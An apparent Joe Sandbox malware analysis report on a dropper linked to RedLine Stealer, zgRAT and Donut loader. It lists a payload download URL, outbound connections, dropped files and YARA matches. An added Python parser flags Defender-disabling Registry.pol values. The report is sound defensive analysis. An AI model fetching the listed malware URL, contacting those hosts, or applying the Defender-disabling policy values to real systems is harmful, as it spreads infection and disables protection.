Source: WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C0A000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C0A000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C0A000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002BEC000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C0A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://zanzibarpivo.com:80/7725eaa6592c80f8124e769b4e8a07f7.exe
Source: WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002BEC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://zanzibarpivo.com:80/7725eaa6592c80f8124e769b4e8a07f7.exeK
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49935 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49936
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49935
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown Network traffic detected: HTTP traffic on port 49902 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49936 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49937 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49902
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49900
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown HTTPS traffic detected: 172.67.75.163:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.32.111:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.144.181:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.180.119:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.121:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.55.189:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.82.182:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown HTTPS traffic detected: 45.130.41.108:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown HTTPS traffic detected: 37.221.125.202:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown HTTPS traffic detected: 93.186.225.194:443 -> 192.168.2.4:49782 version: TLS 1.2
Source: unknown HTTPS traffic detected: 93.186.225.194:443 -> 192.168.2.4:49783 version: TLS 1.2
Source: unknown HTTPS traffic detected: 95.142.206.0:443 -> 192.168.2.4:49785 version: TLS 1.2
Source: unknown HTTPS traffic detected: 95.142.206.2:443 -> 192.168.2.4:49790 version: TLS 1.2
Source: unknown HTTPS traffic detected: 95.142.206.1:443 -> 192.168.2.4:49796 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.147.32:443 -> 192.168.2.4:49802 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.132.113:443 -> 192.168.2.4:49803 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.147.32:443 -> 192.168.2.4:49804 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.147.32:443 -> 192.168.2.4:49805 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.104.85.160:443 -> 192.168.2.4:49807 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49813 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49815 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49834 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49838 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49839 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49840 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49900 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49902 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49935 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49936 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49937 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49938 version: TLS 1.2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Temp\Tmp704E.tmp Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Temp\Tmp703D.tmp Jump to dropped file

System Summary

Source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 21.2.9RJ0JeM9uj2rfsuq_woBmmIY.exe.e2b000.1.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 21.2.9RJ0JeM9uj2rfsuq_woBmmIY.exe.e2b000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 23.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 8.2.pRIMqfuwRZ49ldgjUZ_z2py6.exe.46a3010.2.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 8.2.pRIMqfuwRZ49ldgjUZ_z2py6.exe.46a3010.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 21.2.9RJ0JeM9uj2rfsuq_woBmmIY.exe.e00000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000017.00000002.3121845008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000009.00000002.2945966456.000001C57C0F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000F.00000002.3133986661.0000000003548000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000B.00000002.3128484009.0000000002D47000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000E.00000002.3133832345.000000000352A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: WlCIinu0yp.exe Static PE information: section name:
Source: WlCIinu0yp.exe Static PE information: section name:
Source: fiona[1].exe.0.dr Static PE information: section name:
Source: fiona[1].exe.0.dr Static PE information: section name:
Source: fiona[1].exe.0.dr Static PE information: section name:
Source: fiona[1].exe.0.dr Static PE information: section name:
Source: fiona[1].exe.0.dr Static PE information: section name:
Source: fiona[1].exe.0.dr Static PE information: section name:
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr Static PE information: section name:
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr Static PE information: section name:
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr Static PE information: section name:
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr Static PE information: section name:
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr Static PE information: section name:
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr Static PE information: section name:
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Desktop\WlCIinu0yp.exe File created: C:\Windows\System32\GroupPolicy\gpt.ini Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe File created: C:\Windows\System32\GroupPolicy\Machine Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe File created: C:\Windows\System32\GroupPolicy\User Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe File created: C:\Windows\System32\GroupPolicy\Machine\Registry.pol Jump to behavior
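The Registry.pol written here is the machine-side local Group Policy registry file (MS-GPREG "PReg" format), which is how a dropper can push Defender policy such as the real-time protection and exclusion changes flagged elsewhere in this report without touching the Defender keys directly. The following Python is an added example, not part of the Joe Sandbox report: a parser for that format plus a check for Defender-tampering policy values, run over a constructed Registry.pol. The report records the file creation but not the file's contents, so the values in SAMPLE_POLICY are assumptions for the demo; the key paths are the documented Defender policy keys.

```python
"""PReg (Registry.pol) parser with a Windows Defender policy-tampering check.

Added example, not part of the Joe Sandbox report. Entry layout per MS-GPREG:
[key;value;type;size;data], delimiters and strings in UTF-16LE, key/value
null-terminated, type and size little-endian DWORDs.
"""
import struct
from dataclasses import dataclass

PREG_SIGNATURE = b"PReg"
PREG_VERSION = 1
REG_SZ, REG_EXPAND_SZ, REG_DWORD = 1, 2, 4
LB, SEP, RB = (c.encode("utf-16-le") for c in "[;]")
DEFENDER_POLICY = "software\\policies\\microsoft\\windows defender"


@dataclass(frozen=True)
class PolEntry:
    key: str      # registry key relative to HKLM (Machine) or HKCU (User)
    value: str    # value name
    rtype: int    # REG_* type code
    data: object  # decoded data: str, int or raw bytes


def _wstr(s):
    # every key/value name in PReg is a null-terminated UTF-16LE string
    return (s + "\x00").encode("utf-16-le")


def build_registry_pol(entries):
    """Serialise (key, value, rtype, data) tuples into a Registry.pol blob."""
    out = bytearray(PREG_SIGNATURE + struct.pack("<I", PREG_VERSION))
    for key, value, rtype, data in entries:
        if rtype in (REG_SZ, REG_EXPAND_SZ):
            raw = _wstr(data)
        elif rtype == REG_DWORD:
            raw = struct.pack("<I", data)
        else:
            raw = bytes(data)
        out += LB + _wstr(key) + SEP + _wstr(value) + SEP
        out += struct.pack("<I", rtype) + SEP + struct.pack("<I", len(raw)) + SEP
        out += raw + RB
    return bytes(out)


def _read_wstr(buf, pos):
    end = pos
    while end + 2 <= len(buf) and buf[end:end + 2] != b"\x00\x00":
        end += 2
    if end + 2 > len(buf):
        raise ValueError("unterminated string")
    return buf[pos:end].decode("utf-16-le"), end + 2


def _expect(buf, pos, delim):
    if buf[pos:pos + 2] != delim:
        raise ValueError(f"malformed entry at offset {pos}")
    return pos + 2


def _decode(rtype, raw):
    if rtype in (REG_SZ, REG_EXPAND_SZ):
        return raw.decode("utf-16-le").rstrip("\x00")
    if rtype == REG_DWORD and len(raw) == 4:
        return struct.unpack("<I", raw)[0]
    return raw


def parse_registry_pol(buf):
    """Parse a Registry.pol blob into PolEntry records; raises on malformed input."""
    if buf[:4] != PREG_SIGNATURE or struct.unpack_from("<I", buf, 4)[0] != PREG_VERSION:
        raise ValueError("not a version-1 PReg file")
    pos, entries = 8, []
    while pos < len(buf):
        pos = _expect(buf, pos, LB)
        key, pos = _read_wstr(buf, pos)
        pos = _expect(buf, pos, SEP)
        value, pos = _read_wstr(buf, pos)
        pos = _expect(buf, pos, SEP)
        rtype = struct.unpack_from("<I", buf, pos)[0]
        pos = _expect(buf, pos + 4, SEP)
        size = struct.unpack_from("<I", buf, pos)[0]
        pos = _expect(buf, pos + 4, SEP)
        raw, pos = buf[pos:pos + size], pos + size
        pos = _expect(buf, pos, RB)
        entries.append(PolEntry(key, value, rtype, _decode(rtype, raw)))
    return entries


def defender_tampering(entries):
    """Return human-readable findings for Defender-weakening policy values."""
    findings = []
    for e in entries:
        k = e.key.lower()
        if not k.startswith(DEFENDER_POLICY):
            continue
        if k == DEFENDER_POLICY and e.value.lower() == "disableantispyware" and e.data == 1:
            findings.append("Defender disabled by policy (DisableAntiSpyware=1)")
        elif k.endswith("\\real-time protection") and e.value.lower() == "disablerealtimemonitoring" and e.data == 1:
            findings.append("real-time protection disabled by policy (DisableRealtimeMonitoring=1)")
        elif "\\exclusions\\" in k:
            findings.append(f"exclusion added ({k.rsplit(chr(92), 1)[-1]}): {e.value}")
    return findings


# Constructed policy content: an assumption about what the sample writes.
SAMPLE_POLICY = [
    (r"Software\Policies\Microsoft\Windows Defender", "DisableAntiSpyware", REG_DWORD, 1),
    (r"Software\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableRealtimeMonitoring", REG_DWORD, 1),
    (r"Software\Policies\Microsoft\Windows Defender\Exclusions\Paths", r"C:\Users\user\Documents\SimpleAdobe", REG_SZ, "0"),
    (r"Software\Policies\Microsoft\Windows Defender\Exclusions\Extensions", "exe", REG_SZ, "0"),
    (r"Software\Policies\Microsoft\Windows\Explorer", "NoDriveTypeAutoRun", REG_DWORD, 255),  # unrelated control
]

if __name__ == "__main__":
    for finding in defender_tampering(parse_registry_pol(build_registry_pol(SAMPLE_POLICY))):
        print(finding)
```

On a live host, point parse_registry_pol at the bytes of C:\Windows\System32\GroupPolicy\Machine\Registry.pol (and the User\ counterpart) from a forensic image; the policy values take precedence over the Defender keys under HKLM\SOFTWARE\Microsoft\Windows Defender, so checking only those keys misses this technique.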
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_004E925D 7_2_004E925D
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_00496450 7_2_00496450
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_0040C490 7_2_0040C490
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_0045A490 7_2_0045A490
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_004564A0 7_2_004564A0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_0045B4B0 7_2_0045B4B0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_00458520 7_2_00458520
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_0043B750 7_2_0043B750
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_00438770 7_2_00438770
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_0043C800 7_2_0043C800
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_004378A0 7_2_004378A0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_00442940 7_2_00442940
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_00439A80 7_2_00439A80
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_00434B20 7_2_00434B20
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_0042EB90 7_2_0042EB90
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_0045CC40 7_2_0045CC40
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_0040BFC0 7_2_0040BFC0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_0048E040 7_2_0048E040
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_0044C160 7_2_0044C160
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_00490100 7_2_00490100
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_00487270 7_2_00487270
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_0047F360 7_2_0047F360
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_004E03D0 7_2_004E03D0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_00483470 7_2_00483470
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_00402410 7_2_00402410
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_004944E0 7_2_004944E0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_00416490 7_2_00416490
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_004E959F 7_2_004E959F
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_00402600 7_2_00402600
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_00472630 7_2_00472630
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_00433740 7_2_00433740
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_00470760 7_2_00470760
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_0040E7B0 7_2_0040E7B0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_0048F7B0 7_2_0048F7B0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_004FB84F 7_2_004FB84F
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_00471830 7_2_00471830
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_004FD9FE 7_2_004FD9FE
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_0041F9B0 7_2_0041F9B0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_00481A30 7_2_00481A30
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_004E3B58 7_2_004E3B58
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_0044EB90 7_2_0044EB90
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_004E5B90 7_2_004E5B90
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_004F6CC5 7_2_004F6CC5
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_00490E40 7_2_00490E40
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_0049EE70 7_2_0049EE70
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_00418EE0 7_2_00418EE0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_00483EF0 7_2_00483EF0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_00482FE0 7_2_00482FE0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_00493FF0 7_2_00493FF0
Source: Joe Sandbox View Dropped File: C:\ProgramData\DDEReadline 2.22.66\DDEReadline 2.22.66.exe 4C5C6DEBE9453F0343F163AA72B7049F3167BC08D3B2D549FCABC4EE6BFBAFCD
Source: Joe Sandbox View Dropped File: C:\ProgramData\MSIUpdaterV202_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV202.exe 491D7B93C49438AC2B97E8AD343B99ABBCC3536D9D32DE6972FF64A7EC32F858
Source: Joe Sandbox View Dropped File: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe 0823C2F58D094E1C096AE9184ACF0B930DF6DFF97D0CD77728DC3FF07F9C0096
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: String function: 0046A190 appears 47 times
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: String function: 00469F00 appears 32 times
Source: 060[1].exe.0.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: FCK5Px_iTbBaGQTFBpzZeks2.exe.0.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: ydYqwUL3GNS6IHkMgIteny78.exe.0.dr Static PE information: No import functions for PE file found
Source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 21.2.9RJ0JeM9uj2rfsuq_woBmmIY.exe.e2b000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 21.2.9RJ0JeM9uj2rfsuq_woBmmIY.exe.e2b000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 23.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 8.2.pRIMqfuwRZ49ldgjUZ_z2py6.exe.46a3010.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 8.2.pRIMqfuwRZ49ldgjUZ_z2py6.exe.46a3010.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 21.2.9RJ0JeM9uj2rfsuq_woBmmIY.exe.e00000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000017.00000002.3121845008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000009.00000002.2945966456.000001C57C0F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000F.00000002.3133986661.0000000003548000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
